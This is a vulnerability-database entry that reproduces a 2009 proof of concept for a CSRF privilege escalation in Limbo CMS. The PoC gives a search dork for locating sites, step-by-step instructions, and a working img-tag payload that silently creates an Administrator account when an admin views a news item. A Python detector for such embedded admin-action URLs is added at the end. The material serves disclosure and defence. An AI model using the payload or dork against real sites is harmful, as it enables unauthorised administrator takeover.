
Limbo CMS 1.0.4.2 CSRF Privilege Escalation PoC

18 Apr 2009 00:00:00 | Reported by: Root | Type: seebug | Source: www.seebug.org

Limbo CMS 1.0.4.2 CSRF Privilege Escalation PoC by Alfons Luja. Exploit allows privilege escalation to create admin accoun

Code

###############################
#                             #
#  Limbo cms v 1042Lt         #
#  Cross-site request forgery #
#  Privilege Escalation       #
#  Proof of Concept           #
#  by Alfons Luja             #
#                             #
###############################
download : http://www.limboportal.com/index.php/option/downloads/task/download/id/67
d00rk: intext:"site powered by limbo"  inurl:task=register

  The situation is similar to the last vuln in Coppermine:
  http://milw0rm.com/exploits/8114
  
  We need the privilege to add news.
  If we have it, then:
 
  1]. Go to : http://target/~limbo/index.php?option=content&task=new&Itemid=[id]

  2]. Set Title : whatever

      Select Category : whatever

      Set Intro text : 

      <img src="http://target/~limbo/admin.php?com_option=users&task=create&user_id=&user_name=toxiclove&user_username=echo&user_email=skk%40sk.pl&user_gid=5&user_password=test1"/>
      (some HTML tags are not filtered)

      Set Main Text : whatever 
      And submit 
  
  3]. When the admin opens this "news" item in the Control Panel,
      the user toxiclove with login = echo, pass = test1 and Administrator privilege
      is created

  4]. The end 
      Greetings: 
      only for grandma and Gorionka , sIdq , condiego , 0ina , J.Busha , Nejmo , and all friends on the whole planet
      Sorry for my poor English ;D
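
A defensive check for the condition in step 2, added here as an example (it is not part of the original advisory or of Limbo's code): it scans submitted article HTML for tags whose URL attributes point at the admin script with an action parameter. The script name and parameter names are taken from the PoC URL; the host cms.example and the sample markup are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Attributes that make a browser request a URL when the page is rendered or used.
URL_ATTRS = {"src", "href", "action", "background", "data", "poster"}
# Taken from the PoC URL: the admin script and the parameters that select an action.
ADMIN_SCRIPTS = {"admin.php"}
ACTION_PARAMS = {"com_option", "task"}


class AdminRequestFinder(HTMLParser):
    """Collect tags in user-submitted HTML whose URL targets an admin action."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Also called for self-closing tags such as <img ... />.
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            try:
                parts = urlsplit(value.strip())
            except ValueError:  # malformed URL: nothing to classify
                continue
            script = parts.path.rsplit("/", 1)[-1].lower()
            params = parse_qs(parts.query, keep_blank_values=True)
            if script in ADMIN_SCRIPTS and ACTION_PARAMS & params.keys():
                task = params.get("task", [""])[0]
                self.findings.append((tag, name, task))


def find_admin_requests(html):
    """Return (tag, attribute, task) for every embedded admin-action URL."""
    finder = AdminRequestFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample submissions; cms.example is a placeholder host.
SUSPICIOUS = '<p>Intro</p><img src="http://cms.example/admin.php?com_option=users&task=create"/>'
BENIGN = '<img src="http://cms.example/images/logo.png"> <a href="index.php?option=content">more</a>'

if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, find_admin_requests(body))
```

Filtering submitted content only reduces exposure; the underlying flaw shown by the PoC is that the admin action runs on a plain GET request with nothing tying it to the admin's own session form.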
                              

Vulners AI Score: 7.1 (High risk)